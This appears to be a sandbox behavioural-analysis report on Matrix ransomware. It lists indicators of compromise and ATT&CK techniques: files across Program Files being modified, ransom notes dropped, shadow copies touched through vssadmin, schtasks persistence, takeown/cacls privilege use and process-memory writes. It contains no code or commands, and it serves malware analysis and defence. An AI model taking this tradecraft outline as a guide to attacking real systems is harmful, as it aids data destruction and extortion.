File opened (read-only)	\??\Q:	MatrixRansomware.exe
File opened (read-only)	\??\G:	MatrixRansomware.exe
File opened (read-only)	\??\B:	WZX2Alx164.exe
File opened (read-only)	\??\U:	WZX2Alx164.exe
File opened (read-only)	\??\W:	WZX2Alx164.exe
File opened (read-only)	\??\T:	MatrixRansomware.exe
File opened (read-only)	\??\K:	MatrixRansomware.exe
File opened (read-only)	\??\H:	MatrixRansomware.exe
File opened (read-only)	\??\H:	WZX2Alx164.exe
File opened (read-only)	\??\P:	WZX2Alx164.exe
File opened (read-only)	\??\V:	WZX2Alx164.exe
File opened (read-only)	\??\Y:	WZX2Alx164.exe
File opened (read-only)	\??\E:	MatrixRansomware.exe
File opened (read-only)	\??\S:	MatrixRansomware.exe
File opened (read-only)	\??\P:	MatrixRansomware.exe
File opened (read-only)	\??\J:	MatrixRansomware.exe
File opened (read-only)	\??\K:	WZX2Alx164.exe
File opened (read-only)	\??\S:	WZX2Alx164.exe
File opened (read-only)	\??\T:	WZX2Alx164.exe
File opened (read-only)	\??\R:	MatrixRansomware.exe
File opened (read-only)	\??\M:	MatrixRansomware.exe
File opened (read-only)	\??\E:	WZX2Alx164.exe
File opened (read-only)	\??\J:	WZX2Alx164.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\c9VRSLTg.bmp"	reg.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002b2c9-6392.dat	upx
behavioral1/memory/8160-6948-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2652-6984-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6844-6995-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8572-7015-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7924-7079-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/864-7081-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7292-7086-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4780-7099-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/9064-7103-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8976-7106-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8864-7108-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8740-7112-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6372-7418-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7516-7420-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6644-7425-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8388-7423-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8780-9636-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4792-9639-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6888-9637-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8376-9633-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3584-9631-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1904-9628-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8744-9627-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/280-9624-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2284-9622-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8064-9619-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3588-9617-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2584-9615-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2332-7417-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/9136-7101-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6200-7097-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6424-7095-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8312-7093-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5928-7091-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7184-7089-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5912-7084-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8896-7076-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1380-7073-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5892-7068-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5228-7064-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3464-7059-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8176-7056-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5904-7051-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4548-7048-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4492-7043-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7704-7040-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/296-7035-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7212-7032-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5680-7027-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5244-7024-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/892-7021-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5576-7018-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7080-7012-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6564-9646-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6928-7009-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6800-7006-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/8836-9648-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6552-7003-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7428-7000-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4896-6992-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/6732-6987-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5840-9650-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/7364-9652-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\ta.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\bs.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\ro.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_proxy\dev.identity_helper.exe.manifest	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_de.properties	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\ne.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\delegatedWebFeatures.sccd	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\gd.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\VisualElements\Logo.png	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\uk.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\hi.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\v8_context_snapshot.bin	MatrixRansomware.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Trust Protection Lists\Mu\LICENSE	MatrixRansomware.exe
File opened for modification	C:\Program Files\ConfirmWait.bin	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\resources.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Locales\af.pak.DATA	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\legal\javafx\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre-1.8\lib\deploy\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\edge_feedback\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdate.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\ConvertToMount.mov	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales\kn.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\BHO\ie_to_edge_stub.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\Trust Protection Lists\Sigma\Advertising	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\application.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\VisualElements\LogoDev.png	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\AdSelectionAttestationsPreloaded\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\management\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Trust Protection Lists\Mu\Analytics	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\servertool.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\management\jmxremote.password.template	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\ResiliencyLinks\Trust Protection Lists\Mu\CompatExceptions.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\javafx-src.zip	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\Trust Protection Lists\Sigma\Staging	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\as.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\sl.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\dnsns.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\ca.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Trust Protection Lists\Sigma\Social	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\Locales\ro.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\resources.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\fi.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\ResiliencyLinks\Locales\sk.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\en-US.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Trust Protection Lists\Sigma\Cryptomining.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\Locales\ca.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\pt-PT.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\MEIPreload\manifest.json.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\ResiliencyLinks\Locales\it.pak.DATA	MatrixRansomware.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WZX2Alx1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
8832	vssadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8368	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe
7512	WZX2Alx164.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
7512	WZX2Alx164.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	7232	takeown.exe
Token: SeDebugPrivilege	7512	WZX2Alx164.exe
Token: SeLoadDriverPrivilege	7512	WZX2Alx164.exe
Token: SeBackupPrivilege	8888	vssvc.exe
Token: SeRestorePrivilege	8888	vssvc.exe
Token: SeAuditPrivilege	8888	vssvc.exe
Token: SeIncreaseQuotaPrivilege	7680	WMIC.exe
Token: SeSecurityPrivilege	7680	WMIC.exe
Token: SeTakeOwnershipPrivilege	7680	WMIC.exe
Token: SeLoadDriverPrivilege	7680	WMIC.exe
Token: SeSystemProfilePrivilege	7680	WMIC.exe
Token: SeSystemtimePrivilege	7680	WMIC.exe
Token: SeProfSingleProcessPrivilege	7680	WMIC.exe
Token: SeIncBasePriorityPrivilege	7680	WMIC.exe
Token: SeCreatePagefilePrivilege	7680	WMIC.exe
Token: SeBackupPrivilege	7680	WMIC.exe
Token: SeRestorePrivilege	7680	WMIC.exe
Token: SeShutdownPrivilege	7680	WMIC.exe
Token: SeDebugPrivilege	7680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7680	WMIC.exe
Token: SeRemoteShutdownPrivilege	7680	WMIC.exe
Token: SeUndockPrivilege	7680	WMIC.exe
Token: SeManageVolumePrivilege	7680	WMIC.exe
Token: 33	7680	WMIC.exe
Token: 34	7680	WMIC.exe
Token: 35	7680	WMIC.exe
Token: 36	7680	WMIC.exe
Token: SeIncreaseQuotaPrivilege	7680	WMIC.exe
Token: SeSecurityPrivilege	7680	WMIC.exe
Token: SeTakeOwnershipPrivilege	7680	WMIC.exe
Token: SeLoadDriverPrivilege	7680	WMIC.exe
Token: SeSystemProfilePrivilege	7680	WMIC.exe
Token: SeSystemtimePrivilege	7680	WMIC.exe
Token: SeProfSingleProcessPrivilege	7680	WMIC.exe
Token: SeIncBasePriorityPrivilege	7680	WMIC.exe
Token: SeCreatePagefilePrivilege	7680	WMIC.exe
Token: SeBackupPrivilege	7680	WMIC.exe
Token: SeRestorePrivilege	7680	WMIC.exe
Token: SeShutdownPrivilege	7680	WMIC.exe
Token: SeDebugPrivilege	7680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7680	WMIC.exe
Token: SeRemoteShutdownPrivilege	7680	WMIC.exe
Token: SeUndockPrivilege	7680	WMIC.exe
Token: SeManageVolumePrivilege	7680	WMIC.exe
Token: 33	7680	WMIC.exe
Token: 34	7680	WMIC.exe
Token: 35	7680	WMIC.exe
Token: 36	7680	WMIC.exe
Token: SeTakeOwnershipPrivilege	4672	takeown.exe
Token: SeTakeOwnershipPrivilege	8080	takeown.exe
Token: SeTakeOwnershipPrivilege	3332	takeown.exe
Token: SeTakeOwnershipPrivilege	6608	takeown.exe
Token: SeTakeOwnershipPrivilege	8324	takeown.exe
Token: SeTakeOwnershipPrivilege	6692	takeown.exe
Token: SeTakeOwnershipPrivilege	7060	takeown.exe
Token: SeTakeOwnershipPrivilege	4720	takeown.exe
Token: SeTakeOwnershipPrivilege	5220	takeown.exe
Token: SeTakeOwnershipPrivilege	4052	takeown.exe
Token: SeTakeOwnershipPrivilege	6220	takeown.exe
Token: SeTakeOwnershipPrivilege	6348	takeown.exe
Token: SeTakeOwnershipPrivilege	8764	takeown.exe
Token: SeTakeOwnershipPrivilege	4184	takeown.exe
Token: SeTakeOwnershipPrivilege	7296	takeown.exe
Token: SeTakeOwnershipPrivilege	3516	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 5644	4260	MatrixRansomware.exe	83
PID 4260 wrote to memory of 5644	4260	MatrixRansomware.exe	83
PID 4260 wrote to memory of 5644	4260	MatrixRansomware.exe	83
PID 4260 wrote to memory of 3276	4260	MatrixRansomware.exe	85
PID 4260 wrote to memory of 3276	4260	MatrixRansomware.exe	85
PID 4260 wrote to memory of 3276	4260	MatrixRansomware.exe	85
PID 4260 wrote to memory of 3336	4260	MatrixRansomware.exe	89
PID 4260 wrote to memory of 3336	4260	MatrixRansomware.exe	89
PID 4260 wrote to memory of 3336	4260	MatrixRansomware.exe	89
PID 4260 wrote to memory of 3416	4260	MatrixRansomware.exe	90
PID 4260 wrote to memory of 3416	4260	MatrixRansomware.exe	90
PID 4260 wrote to memory of 3416	4260	MatrixRansomware.exe	90
PID 3416 wrote to memory of 976	3416	cmd.exe	93
PID 3416 wrote to memory of 976	3416	cmd.exe	93
PID 3416 wrote to memory of 976	3416	cmd.exe	93
PID 3336 wrote to memory of 3352	3336	cmd.exe	126
PID 3336 wrote to memory of 3352	3336	cmd.exe	126
PID 3336 wrote to memory of 3352	3336	cmd.exe	126
PID 3336 wrote to memory of 1540	3336	cmd.exe	95
PID 3336 wrote to memory of 1540	3336	cmd.exe	95
PID 3336 wrote to memory of 1540	3336	cmd.exe	95
PID 3336 wrote to memory of 6140	3336	cmd.exe	96
PID 3336 wrote to memory of 6140	3336	cmd.exe	96
PID 3336 wrote to memory of 6140	3336	cmd.exe	96
PID 4260 wrote to memory of 2444	4260	MatrixRansomware.exe	97
PID 4260 wrote to memory of 2444	4260	MatrixRansomware.exe	97
PID 4260 wrote to memory of 2444	4260	MatrixRansomware.exe	97
PID 976 wrote to memory of 2388	976	wscript.exe	100
PID 976 wrote to memory of 2388	976	wscript.exe	100
PID 976 wrote to memory of 2388	976	wscript.exe	100
PID 2388 wrote to memory of 8368	2388	cmd.exe	102
PID 2388 wrote to memory of 8368	2388	cmd.exe	102
PID 2388 wrote to memory of 8368	2388	cmd.exe	102
PID 2444 wrote to memory of 7844	2444	cmd.exe	103
PID 2444 wrote to memory of 7844	2444	cmd.exe	103
PID 2444 wrote to memory of 7844	2444	cmd.exe	103
PID 976 wrote to memory of 5036	976	wscript.exe	410
PID 976 wrote to memory of 5036	976	wscript.exe	410
PID 976 wrote to memory of 5036	976	wscript.exe	410
PID 5036 wrote to memory of 8292	5036	cmd.exe	106
PID 5036 wrote to memory of 8292	5036	cmd.exe	106
PID 5036 wrote to memory of 8292	5036	cmd.exe	106
PID 2444 wrote to memory of 7232	2444	cmd.exe	184
PID 2444 wrote to memory of 7232	2444	cmd.exe	184
PID 2444 wrote to memory of 7232	2444	cmd.exe	184
PID 2444 wrote to memory of 7328	2444	cmd.exe	109
PID 2444 wrote to memory of 7328	2444	cmd.exe	109
PID 2444 wrote to memory of 7328	2444	cmd.exe	109
PID 7328 wrote to memory of 7352	7328	cmd.exe	110
PID 7328 wrote to memory of 7352	7328	cmd.exe	110
PID 7328 wrote to memory of 7352	7328	cmd.exe	110
PID 7352 wrote to memory of 7512	7352	WZX2Alx1.exe	112
PID 7352 wrote to memory of 7512	7352	WZX2Alx1.exe	112
